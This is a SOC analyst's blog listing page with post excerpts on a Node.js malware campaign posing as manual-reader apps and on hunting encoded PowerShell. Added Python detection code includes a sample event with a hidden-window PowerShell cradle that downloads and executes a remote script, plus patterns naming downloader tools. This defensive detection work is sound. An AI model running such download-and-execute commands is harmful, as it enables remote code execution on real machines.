Blog
Technical insights on SIEM, EDR, and Blue Team operations from the SOC
-
Building a Security-Focused Homelab: Lessons from Week One
Starting my homelab journey has been more rewarding than I expected. After researching budget options, I settled on a Dell OptiPlex 7070 with 16GB of RAM, 256GB of storage, and an Intel i5 8500T. It’s not the most powerful machine on the market, but it’s proven more than adequate for my needs.
The Setup
I installed Proxmox as my hypervisor and spun up several virtual machines to create a functional security testing environment:
-
Active Node.js Malware Campaign Targeting Manual Reader Applications
We’re seeing a significant uptick in a malware campaign that’s affecting multiple customers. This one’s worth knowing about if you’re in a SOC or working with EDR platforms.
The Campaign
Attackers are distributing malicious Node.js payloads disguised as manual reader and document utility applications. The names are designed to look legitimate: AllManualsReader, OpenMyManual, ManualFinder, AppSuitePDF, and OneStart.
Initial distribution appears to be through SEO poisoning. Users search for manuals or document tools, find these applications in search results, and download what they think is a legitimate utility.
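As an added example (my code, not the post's or any vendor's), here is hunting logic in Python run over a few constructed EDR process-creation events. The application names come from the post. Everything else is an assumption: that the payload runs under a node.exe dropped into a user-writable directory, and that a node parent spawning a shell or a LOLBin downloader is the follow-on activity worth flagging.

```python
import re

# Application names the campaign uses, as listed in the post.
CAMPAIGN_APP_NAMES = ("allmanualsreader", "openmymanual", "manualfinder",
                      "appsuitepdf", "onestart")

# Assumption (not from the post): the dropped Node.js runtime lives in a
# user-writable directory, which a legitimate Node install normally does not.
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|programdata)\\", re.I)
NODE_BINARY = re.compile(r"(^|\\)node(\.exe)?$", re.I)
# Assumption: follow-on activity is a shell or LOLBin downloader spawned by node.
SHELL_OR_DOWNLOADER = re.compile(r"(powershell|pwsh|cmd\.exe|curl|certutil|bitsadmin)", re.I)

# Constructed sample events in the shape of EDR process-creation telemetry.
SAMPLE_EVENTS = [
    {"id": "evt-1",  # legitimate developer Node install, launched by an editor
     "image": r"C:\Program Files\nodejs\node.exe",
     "cmdline": "node.exe server.js",
     "parent_image": r"C:\Users\alice\AppData\Local\Programs\Microsoft VS Code\Code.exe"},
    {"id": "evt-2",  # node runtime bundled under a campaign app name in AppData
     "image": r"C:\Users\alice\AppData\Local\AllManualsReader\node.exe",
     "cmdline": "node.exe app.js",
     "parent_image": r"C:\Users\alice\Downloads\AllManualsReader-Setup.exe"},
    {"id": "evt-3",  # hidden PowerShell spawned by a node binary under OneStart
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"Start-Sleep 5\"",
     "parent_image": r"C:\Users\bob\AppData\Roaming\OneStart\node.exe"},
    {"id": "evt-4",  # unrelated browser activity
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe --type=renderer",
     "parent_image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
]


def score_event(ev):
    """Return the list of reasons an event looks like this campaign (empty if none)."""
    reasons = []
    image, cmdline, parent = ev["image"], ev["cmdline"], ev["parent_image"]
    haystack = f"{image} {cmdline} {parent}".lower()
    for name in CAMPAIGN_APP_NAMES:
        if name in haystack:
            reasons.append(f"campaign app name: {name}")
    if NODE_BINARY.search(image) and USER_WRITABLE.search(image):
        reasons.append("node runtime executing from user-writable path")
    if NODE_BINARY.search(parent) and SHELL_OR_DOWNLOADER.search(cmdline):
        reasons.append("node parent spawning shell or downloader")
    return reasons


def hunt_campaign_events(events):
    """Return (event id, reasons) for every event with at least one reason."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["id"], reasons))
    return hits


if __name__ == "__main__":
    for event_id, reasons in hunt_campaign_events(SAMPLE_EVENTS):
        print(event_id, "->", "; ".join(reasons))
```

The name list is the brittle part: it catches this campaign and nothing else, and the operators can rename the installer tomorrow. The two path and parent-child checks are the ones worth keeping as a standing detection, because a Node runtime in AppData that spawns PowerShell is rare on a managed endpoint regardless of what the app calls itself.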
-
Building Effective Threat Hunting Queries
Effective threat hunting queries help you find what automated detections miss. Here’s my approach to building them.
Start with a Hypothesis
Before writing a query, form a hypothesis about adversary behavior. Instead of “check for PowerShell activity,” try “threat actors may use encoded PowerShell commands to download payloads.”
This frames your hunt around specific TTPs rather than casting a wide net.
Build Queries That Surface Anomalies
Here’s a query for hunting suspicious PowerShell usage:
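As an added example (my code, not the post's own query), here is the hypothesis from above, "threat actors may use encoded PowerShell commands to download payloads", implemented as hunting logic in Python over constructed process-creation events. It decodes the `-EncodedCommand` argument (UTF-16LE wrapped in base64, which is how powershell.exe expects it) and only flags the event if the decoded script contains a download primitive, so a benign encoded `Get-Date` does not fire. The list of download primitives is my choice, not the post's.

```python
import base64
import re

# Any unambiguous prefix of -EncodedCommand that powershell.exe accepts.
# The \b keeps "-ExecutionPolicy" from matching as "-e".
ENC_FLAG = re.compile(
    r"-(?:e|ec|en|enc|enco|encod|encode|encoded|encodedc|encodedcommand)\b\s+"
    r"([A-Za-z0-9+/=]+)", re.I)

# Download primitives worth flagging inside a decoded script (my selection).
DOWNLOAD_PATTERNS = re.compile(
    r"(Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|DownloadString|"
    r"DownloadFile|Net\.WebClient|Start-BitsTransfer|\bcurl\b|\bwget\b)", re.I)


def encode_for_powershell(script):
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64.
    Used here only to build the constructed sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the command line
    has no encoded argument or the argument is not valid UTF-16LE base64."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_encoded_powershell(events):
    """Return one hit per event whose decoded script contains a download primitive."""
    hits = []
    for ev in events:
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        m = DOWNLOAD_PATTERNS.search(decoded)
        if m:
            hits.append({"id": ev["id"], "indicator": m.group(1), "script": decoded})
    return hits


# Constructed sample events; example.invalid is a reserved name, not a real host.
SAMPLE_EVENTS = [
    {"id": "evt-1",  # hidden window, encoded download cradle: should fire
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p.ps1')")},
    {"id": "evt-2",  # encoded but harmless: decodes, no download primitive
     "cmdline": "powershell.exe -EncodedCommand " + encode_for_powershell("Get-Date")},
    {"id": "evt-3",  # -ExecutionPolicy must not be mistaken for -e
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"id": "evt-4",  # malformed encoded argument: decode fails cleanly
     "cmdline": "powershell.exe -e not_base64!!"},
]


if __name__ == "__main__":
    for hit in hunt_encoded_powershell(SAMPLE_EVENTS):
        print(hit["id"], hit["indicator"], repr(hit["script"]))
```

Decoding before matching is the point of the hunt: a query that only looks for `-enc` on the command line surfaces every signed admin script that happens to use encoding, while a query that only looks for `DownloadString` never sees it inside the base64. Decoding in the query (or in a pre-processing step in your SIEM pipeline) lets you match on the behaviour rather than the wrapper.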
-
Welcome to my blog
I’m Elmer Phillips, a Security Analyst working in Managed Detection & Response at At-Bay. This blog is where I share practical notes from the SOC. Detection engineering, SIEM queries, threat hunting techniques, and lessons learned from 3 years of blue team work.
Security is a team sport. If these posts help you catch something faster or tune out some noise, that’s a win.
Best Practice: Focus on quality over quantity. A smaller set of high-signal detections beats dozens of noisy rules.